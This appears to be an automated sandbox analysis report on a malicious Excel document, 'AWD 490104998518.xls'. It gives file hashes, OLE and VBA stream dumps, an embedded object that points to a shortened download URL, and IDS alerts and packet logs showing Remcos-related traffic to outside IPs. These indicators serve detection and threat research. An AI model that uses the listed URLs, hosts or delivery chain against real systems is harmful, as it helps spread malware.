                  Preview:..d.i.m. .p.l.a.t.i.n.a.m.i.n.a. .....p.l.a.t.i.n.a.m.i.n.a. .=. .m.e.l.e.a.n.t.e.....a.c.o.v.a.r.(.".m.a.r.a.n.h.a.r.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".d.r.u.p.a.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".i.n.d.i.g.e.n.a.t.o.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".m.u.l.h.e.r.i.n.h.a.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".X._.H.e.l.p.U.r.i.s._.0.0.5._.0._.M.e.s.s.a.g.e.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".a.n.t.r.o.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".m.a.s.c.a.r.a.d.a.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".X._.H.e.l.p.U.r.i.s._.0.0.8._.0._.M.e.s.s.a.g.e.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".X._.H.e.l.p.U.r.i.s._.0.0.9._.0._.M.e.s.s.a.g.e.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".X._.H.e.l.p.U.r.i.s._.0.1.0._.0._.M.e.s.s.a.g.e.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".L._.H.e.l.p.
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 12:09:15 2024, Security: 1
                  Category:dropped
                  Size (bytes):1286656
                  Entropy (8bit):7.985271791399071
                  Encrypted:false
                  SSDEEP:24576:36sKGQKr9+FZF+S0ANklw1Q1Ftt5RV8yIQxpoUSIV/pgTNEEt5jpM9:BHr9+FZQNw1Q1l5rBIcqcpONEEt5ji9
                  MD5:0E5726EFB558653F8C1D495E51EB4887
                  SHA1:4E24194879DC923E024B9BCD7F9E2968709AEAE6
                  SHA-256:499DC1040CF41D124103D3A7858565009CED920AEFB34DEB48B9A9E97446560E
                  SHA-512:69E19E484551229921B843E9CF76F37B07E747E0CCEF127C2FC03752CC6712F7FD8B72679D4BB61704AF2DF476F2ED7CBCD566739C18595C24048AF39CBF85BD
                  Malicious:false
                  Preview:......................>...............................................................................................v.......x.......z.......|.......~................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:false
                  Preview:[ZoneTransfer]....ZoneId=0
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 12:09:15 2024, Security: 1
                  Category:dropped
                  Size (bytes):1286656
                  Entropy (8bit):7.985271791399071
                  Encrypted:false
                  SSDEEP:24576:36sKGQKr9+FZF+S0ANklw1Q1Ftt5RV8yIQxpoUSIV/pgTNEEt5jpM9:BHr9+FZQNw1Q1l5rBIcqcpONEEt5ji9
                  MD5:0E5726EFB558653F8C1D495E51EB4887
                  SHA1:4E24194879DC923E024B9BCD7F9E2968709AEAE6
                  SHA-256:499DC1040CF41D124103D3A7858565009CED920AEFB34DEB48B9A9E97446560E
                  SHA-512:69E19E484551229921B843E9CF76F37B07E747E0CCEF127C2FC03752CC6712F7FD8B72679D4BB61704AF2DF476F2ED7CBCD566739C18595C24048AF39CBF85BD
                  Malicious:true
                  Preview:......................>...............................................................................................v.......x.......z.......|.......~................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 03:46:25 2024, Security: 1
                  Entropy (8bit):7.9814638526740325
                  TrID:
                  • Microsoft Excel sheet (30009/1) 47.99%
                  • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                  • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                  File name:AWD 490104998518.xls
                  File size:1'302'528 bytes
                  MD5:f63c009bccbc4d8d26d162a168feaeb1
                  SHA1:fa8ab13582703932f968a31e6cc0973e45ca43e0
                  SHA256:f9541983f2c2e2f0a0a72dce180342d0637a52a4ba6e49ea42e8c5844d4de9e3
                  SHA512:56a099036928c0af89d6a4cde7977cf5f3a5626a028aabea8a4dc590dd582c395042ae2c4f05b8085b81a9d19fb12f18beea0fe145712f057ffc12028e063395
                  SSDEEP:24576:D6sKGQKr9+FZF+S0ANklw1Q1Ftt5Kj1G8RjM78quuH6OBrNoDgYEMuFh:9Hr9+FZQNw1Q1l5oGYjMhuu3BRo0Yr+
                  TLSH:3A552315FA4ADAA3EE2A9C790593D217223C6D62FF4582037745732EA03A36593C7F0D
                  File Content Preview:........................>...............................................................................................w.......y.......{.......}..............................................................................................................
                  Icon Hash:276ea3a6a6b7bfbf
                  Document Type:OLE
                  Number of OLE Files:1
                  Has Summary Info:
                  Application Name:Microsoft Excel
                  Encrypted Document:True
                  Contains Word Document Stream:False
                  Contains Workbook/Book Stream:True
                  Contains PowerPoint Document Stream:False
                  Contains Visio Document Stream:False
                  Contains ObjectPool Stream:False
                  Flash Objects Count:0
                  Contains VBA Macros:True
                  Code Page:1252
                  Author:
                  Last Saved By:
                  Create Time:2006-09-16 00:00:00
                  Last Saved Time:2024-07-26 02:46:25
                  Creating Application:Microsoft Excel
                  Security:1
                  Document Code Page:1252
                  Thumbnail Scaling Desired:False
                  Contains Dirty Links:False
                  Shared Document:False
                  Changed Hyperlinks:False
                  Application Version:786432
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                  VBA File Name:Sheet1.cls
                  Stream Size:977
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F 3 I . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 46 33 49 19 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Attribute VB_Name = "Sheet1"
                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                  Attribute VB_GlobalNameSpace = False
                  Attribute VB_Creatable = False
                  Attribute VB_PredeclaredId = True
                  Attribute VB_Exposed = True
                  Attribute VB_TemplateDerived = False
                  Attribute VB_Customizable = True
                  

                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                  VBA File Name:Sheet2.cls
                  Stream Size:977
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F 3 u _ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 46 33 75 5f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Attribute VB_Name = "Sheet2"
                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                  Attribute VB_GlobalNameSpace = False
                  Attribute VB_Creatable = False
                  Attribute VB_PredeclaredId = True
                  Attribute VB_Exposed = True
                  Attribute VB_TemplateDerived = False
                  Attribute VB_Customizable = True
                  

                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                  VBA File Name:Sheet3.cls
                  Stream Size:977
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F 3 V D . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 46 33 56 44 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Attribute VB_Name = "Sheet3"
                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                  Attribute VB_GlobalNameSpace = False
                  Attribute VB_Creatable = False
                  Attribute VB_PredeclaredId = True
                  Attribute VB_Exposed = True
                  Attribute VB_TemplateDerived = False
                  Attribute VB_Customizable = True
                  

                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                  VBA File Name:ThisWorkbook.cls
                  Stream Size:985
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F 3 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 46 33 a2 b6 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Attribute VB_Name = "ThisWorkbook"
                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                  Attribute VB_GlobalNameSpace = False
                  Attribute VB_Creatable = False
                  Attribute VB_PredeclaredId = True
                  Attribute VB_Exposed = True
                  Attribute VB_TemplateDerived = False
                  Attribute VB_Customizable = True
                  

                  General
                  Stream Path:\x1CompObj
                  CLSID:
                  File Type:data
                  Stream Size:114
                  Entropy:4.25248375192737
                  Base64 Encoded:True
                  Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                  General
                  Stream Path:\x5DocumentSummaryInformation
                  CLSID:
                  File Type:data
                  Stream Size:244
                  Entropy:2.889430592781307
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                  General
                  Stream Path:\x5SummaryInformation
                  CLSID:
                  File Type:data
                  Stream Size:200
                  Entropy:3.272567433052416
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . . . . . . . . . . .
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                  General
                  Stream Path:MBD001EFDD9/\x1CompObj
                  CLSID:
                  File Type:data
                  Stream Size:99
                  Entropy:3.631242196770981
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                  General
                  Stream Path:MBD001EFDD9/Package
                  CLSID:
                  File Type:Microsoft Excel 2007+
                  Stream Size:642300
                  Entropy:7.9807610130647495
                  Base64 Encoded:True
                  Data ASCII:P K . . . . . . . . . . ! . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 d4 fe 94 9a b9 01 00 00 c0 06 00 00 13 00 d1 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cd 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  General
                  Stream Path:MBD001EFDDA/\x1Ole
                  CLSID:
                  File Type:data
                  Stream Size:788
                  Entropy:5.849931837532327
                  Base64 Encoded:False
                  Data ASCII:. . . . P . 4 . . . . . . . . . . . . ( . . . y . . . K . $ . . . h . t . t . p . : . / . / . t . n . y . . . w . t . f . / . s . A . . . . . k . 1 . b K F w ` : 5 _ W X - { . L W F u m . I . i . f r 0 . . j . . ( . ] N K . . . . = g . V y e . 4 P @ + . u 5 a l . ( . . . : ' . . w $ + . V k i P . . . . . * g % A 9 b . 9 W " & < r I h . w . Q J . 4 . A / U 4 m . . @ J . . . . . . . . . . . . . . . . . . . . x . p . 8 . H . 4 . y . E . F . Y . v . g . Q . r . W . j . z . m . 9 . S . Q . 0 . J . w . T . k
                  Data Raw:01 00 00 02 d5 50 f4 03 c4 ef d3 34 00 00 00 00 00 00 00 00 00 00 00 00 28 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 24 01 00 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 74 00 6e 00 79 00 2e 00 77 00 74 00 66 00 2f 00 73 00 41 00 00 00 96 f1 f0 c2 96 da f3 1a 6b d9 e6 80 9d 31 be 04 62 4b 46 77 e8 f3 60 af 93 9a 3a c9 35 94 a1 5f 57 58 2d d7 7b c4 8d 95 4c 57 c5 46
                  General
                  Stream Path:Workbook
                  CLSID:
                  File Type:Applesoft BASIC program data, first line number 16
                  Stream Size:635801
                  Entropy:7.99943136040081
                  Base64 Encoded:True
                  Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . [ . f . + . | q . [ . $ s r f . T . n % { | % t X . . . v . . . . . . . h . . . \\ . p . m 6 . y 9 6 . . . . & ~ 1 e . . . i . z : 2 C . _ < ? T > . . T # j E 3 ' b ) C < . g 0 2 . @ s l . . . M w c W O i m 4 . 9 f v . $ S B . . . p a . . . . . . = . . . . { l d > J . . . F u . R . O [ ; . . . . . . . . . . . . 4 . . . . ) . . . . . . . B = . . . F ; ' . 0 . ] e . @ . . . . . . . M " . . . . . . . . . . . . . . . . g 1 . . . 7 < . . k . . R U + . x o 1
                  Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 5b 18 a9 97 e6 66 88 1e 2b 00 ba 7c 71 e4 d1 0d b1 5b 01 81 24 d3 73 72 db 66 11 54 0e 6e a6 25 e4 7b be 7c 25 74 b2 58 8b 92 13 c5 bb c4 a8 76 e1 00 02 00 b0 04 c1 00 02 00 be 68 e2 00 00 00 5c 00 70 00 fc 6d 36 08 79 39 af 36 cc aa d5 fe a3 a6 9a c7 91 06 1b 26 7e a9 c4 31 cd 65 1c 14 1a 99
                  General
                  Stream Path:_VBA_PROJECT_CUR/PROJECT
                  CLSID:
                  File Type:ASCII text, with CRLF line terminators
                  Stream Size:527
                  Entropy:5.27186694728929
                  Base64 Encoded:True
                  Data ASCII:I D = " { 2 6 2 4 1 6 F 0 - 4 4 5 D - 4 6 C 2 - B 6 7 D - 7 C B C 5 3 C 7 0 8 E F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 6 4 6 6 B A 2 1 7 A 8 2 7 E 8 2 7
                  Data Raw:49 44 3d 22 7b 32 36 32 34 31 36 46 30 2d 34 34 35 44 2d 34 36 43 32 2d 42 36 37 44 2d 37 43 42 43 35 33 43 37 30 38 45 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                  General
                  Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                  CLSID:
                  File Type:data
                  Stream Size:104
                  Entropy:3.0488640812019017
                  Base64 Encoded:False
                  Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                  Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                  CLSID:
                  File Type:data
                  Stream Size:2644
                  Entropy:3.9688732230623827
                  Base64 Encoded:False
                  Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                  Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/dir
                  CLSID:
                  File Type:data
                  Stream Size:553
                  Entropy:6.350888072320283
                  Base64 Encoded:True
                  Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . b . h . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                  Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 62 04 b4 68 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                  Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
                  2024-07-26T13:09:04.026573+0200 | TCP | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 49174 | 80 | 192.168.2.22 | 178.237.33.50
                  2024-07-26T13:08:58.500549+0200 | TCP | 2049038 | ET MALWARE Malicious Base64 Encoded Payload In Image | 80 | 49171 | 198.46.176.133 | 192.168.2.22
                  2024-07-26T13:08:59.714462+0200 | TCP | 2020424 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 | 80 | 49172 | 192.3.176.174 | 192.168.2.22
                  2024-07-26T13:08:57.397604+0200 | TCP | 2047750 | ET MALWARE Base64 Encoded MZ In Image | 80 | 49171 | 198.46.176.133 | 192.168.2.22
                  2024-07-26T13:09:01.750905+0200 | TCP | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 49173 | 14645 | 192.168.2.22 | 194.187.251.115
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Jul 26, 2024 13:08:45.803232908 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.803255081 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.805366993 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.805402040 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.805419922 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.805448055 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.871998072 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.872090101 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.872476101 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.872504950 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.872519016 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.872539997 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.874584913 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.874602079 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.874630928 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.874654055 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.876764059 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.876780033 CEST8049166192.3.176.174192.168.2.22
